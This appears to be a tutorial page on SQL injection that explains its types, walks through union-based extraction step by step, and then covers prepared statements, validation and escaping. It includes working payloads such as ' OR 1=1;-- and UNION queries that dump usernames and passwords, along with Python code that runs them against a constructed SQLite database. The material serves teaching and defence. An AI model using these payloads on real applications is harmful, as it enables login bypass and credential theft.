SQL Injection

May 18, 2025

Definition

A web application that uses SQL becomes vulnerable to SQL Injection at the point where user-provided data is included in the text of a SQL query without being kept separate from the query's structure. The database cannot tell which part of the resulting string was the developer's query and which part was the user's input, so input that contains SQL syntax changes what the query does.


Types

  1. In-Band SQLi

    1. The same channel is used to launch the attack and to read its results: the SQL Injection vulnerability is discovered on a website page and the data extracted from the database is returned to that same page. Error-Based and Union-Based SQLi are its two sub-types.
    2. Error-Based SQLi: error messages from the database are printed directly to the browser, so the attacker can craft queries whose error text leaks data.
    3. Union-Based SQLi: utilises the SQL UNION operator alongside a SELECT statement to append rows of the attacker's choosing to the results the page already returns. This is the most common way of extracting large amounts of data via an SQL Injection vulnerability.
  2. Blind SQLi

    1. The application shows neither the query's results nor its errors, so the attacker has to infer the answer from how the application behaves.
    2. Authentication bypass: the simplest case, where the injection only needs to change the truth value of the query rather than return data, e.g. ' OR 1=1;-- in a login form.
    3. Boolean-Based: the page behaves differently depending on whether an injected condition is true or false (a record is shown or not), so data is extracted one true/false question at a time.
    4. Time-Based: there is no visible difference at all, so the attacker injects a deliberate delay (for example MySQL's SLEEP()) behind the condition and reads the answer from the response time.
  3. Out-of-Band SQLi

    1. An Out-Of-Band attack is classified by having two different communication channels, one to launch the attack and the other to gather the results. For example, the attack channel could be a web request, and the data gathering channel could be monitoring HTTP/DNS requests made to a service you control.

Exploiting

  1. Recon: look for a database error by adding a ' or " to the parameter. If the page breaks, the input is reaching the query without being escaped.
  2. Still recon: find the number of columns the original query returns by appending UNION SELECT 1,...,n and increasing n until the error about the SELECTs having a different number of columns disappears; that n is the column count. (Appending ORDER BY n and increasing it until the query errors gives the same answer.)
  3. Get the database name by using the database() function in place of one of the numbers in the UNION, picking a column position that is actually rendered on the page. (database(), information_schema and group_concat() are MySQL/MariaDB features; other engines have their own equivalents.)
  4. List the tables in that database with 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'. The leading 0 is an id that matches no real row, so the only row rendered is the injected one, and group_concat() joins every result into that single displayed field.
  5. Dig deeper into a found table with 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users' (add AND table_schema = 'sqli_one' if another database on the same server could have a table of the same name).
  6. Finally, list all the data in the staff_users table with 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
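The six steps above, run end to end against a simulated vulnerable page, as an added example that is not part of the original page. The target is an in-memory SQLite database with constructed tables (article and staff_users), so the catalogue queries use sqlite_master and pragma_table_info() where the page's MySQL queries use information_schema; the page function, table names and rows are assumptions.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database playing the part of the
# target ('sqli_one' on the page). Table, column names and rows are assumptions.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE article (id INTEGER, title TEXT, body TEXT);
    INSERT INTO article VALUES (1, 'Hello', 'first post'), (2, 'World', 'second post');
    CREATE TABLE staff_users (id INTEGER, username TEXT, password TEXT);
    INSERT INTO staff_users VALUES (1, 'admin', 'p4ssword'), (2, 'martin', 'Hunter2');
""")


def vulnerable_article(article_id):
    """Simulated vulnerable page: ?id= is concatenated into the query and every
    returned row is rendered. A SQL error propagates, which stands in for the
    database error printed to the browser during recon."""
    query = f"SELECT id, title, body FROM article WHERE id = {article_id}"
    return conn.execute(query).fetchall()


def probe_for_error(value):
    """Step 1: does this input break the query? Returns the error text or None."""
    try:
        vulnerable_article(value)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def find_column_count(max_cols=10):
    """Step 2: append UNION SELECT 1,...,n and grow n until the database stops
    complaining that the two SELECTs have a different number of columns."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if probe_for_error(f"0 UNION SELECT {cols}") is None:
            return n
    return None


def union_extract(expr):
    """Steps 3-6: id=0 matches no real article, so the only rendered row is the
    injected one; `expr` replaces the third (displayed) column."""
    rows = vulnerable_article(f"0 UNION SELECT 1,2,{expr}")
    return rows[0][2]


def enumerate_and_dump():
    """Walk the catalogue and dump staff_users. SQLite keeps its catalogue in
    sqlite_master and pragma_table_info() rather than information_schema, so
    these are the SQLite spellings of the page's MySQL queries."""
    tables = union_extract("group_concat(name) FROM sqlite_master WHERE type='table'")
    columns = union_extract("group_concat(name) FROM pragma_table_info('staff_users')")
    creds = union_extract("group_concat(username||':'||password, '<br>') FROM staff_users")
    return tables, columns, creds


if __name__ == "__main__":
    print("error on 1' :", probe_for_error("1'"))
    print("columns:", find_column_count())
    for label, value in zip(("tables", "columns", "rows"), enumerate_and_dump()):
        print(f"{label}: {value}")
```

The id parameter here is numeric and unquoted, which is why the payloads need no leading quote; against a quoted string parameter the same UNION payloads would start with ' and end with a comment sequence to swallow the application's closing quote.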

Mitigation

  1. Prepared Statements (With Parameterized Queries):

    • In a prepared statement the developer writes the SQL query first, with placeholders where the values go, and the user inputs are supplied as parameters afterwards. Because the query's structure is fixed before any data arrives, the database can always distinguish between the query and the data, and no input can change what the query does. As a benefit, it also makes the code cleaner and easier to read.
  2. Input Validation:

    • Input validation can go a long way to protecting what gets put into an SQL query. Employing an allow list restricts input to exactly the strings or character classes the field is expected to contain (for example digits only for an id). A string replacement method in the programming language can strip characters you wish to disallow, but that is a deny list, and deny lists are routinely bypassed with alternative syntax or encodings, so validation belongs alongside prepared statements as defence in depth, not in place of them.
  3. Escaping User Input:

    • Allowing user input containing characters such as ' " $ \ can cause SQL queries to break or, even worse, as we've learnt, open them up for injection attacks. Escaping user input is the method of prepending a backslash (\) to these characters, which then causes them to be parsed as part of a regular string and not as special characters. Use the database driver's own escaping routine rather than a hand-written one, because the rules differ between engines (standard SQL doubles the quote instead of using a backslash), and note that escaping only protects values that sit inside quotes: a numeric id concatenated into the query unquoted can still be injected without any of those characters.
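The three mitigations side by side, as an added example rather than code from the original page: a string-built login query that ' OR 1=1 -- bypasses, the same query as a prepared statement, an allow-list validator, and a quote-doubling escaper (the standard-SQL form that SQLite uses, where the page describes MySQL's backslash form). The users table, its one row and the regular expression are constructed assumptions.

```python
import re
import sqlite3

# Constructed sample data: an in-memory SQLite database with a single user.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 'correct-horse');
""")


def login_vulnerable(username, password):
    """String-built query: the input becomes part of the SQL structure."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_prepared(username, password):
    """Parameterised query: the SQL text is fixed and the driver sends the
    values separately, so a quote in the input is nothing but data."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Allow list: usernames are letters, digits and underscore, 1-32 long.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate_username(username):
    """Allow-list validation, used as defence in depth in front of the
    prepared statement rather than instead of it."""
    return USERNAME_RE.fullmatch(username) is not None


def login_validated(username, password):
    if not validate_username(username):
        return False
    return login_prepared(username, password)


def escape_sql_string(value):
    """Standard-SQL escaping: a quote inside a string literal is written as two
    quotes. MySQL additionally accepts the backslash form the page describes.
    Shown for comparison only; prefer the driver's parameter binding."""
    return value.replace("'", "''")


def login_escaped(username, password):
    query = (f"SELECT id FROM users WHERE username = '{escape_sql_string(username)}' "
             f"AND password = '{escape_sql_string(password)}'")
    return conn.execute(query).fetchone() is not None


if __name__ == "__main__":
    payload = "' OR 1=1 --"
    print("vulnerable:", login_vulnerable(payload, "anything"))
    print("prepared:  ", login_prepared(payload, "anything"))
    print("validated: ", login_validated(payload, "anything"))
    print("escaped:   ", login_escaped(payload, "anything"))
```

The escaping variant stops this particular payload, but it still builds SQL by concatenation, so it is only as safe as every call site remembering to escape; the prepared statement removes that class of mistake entirely.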
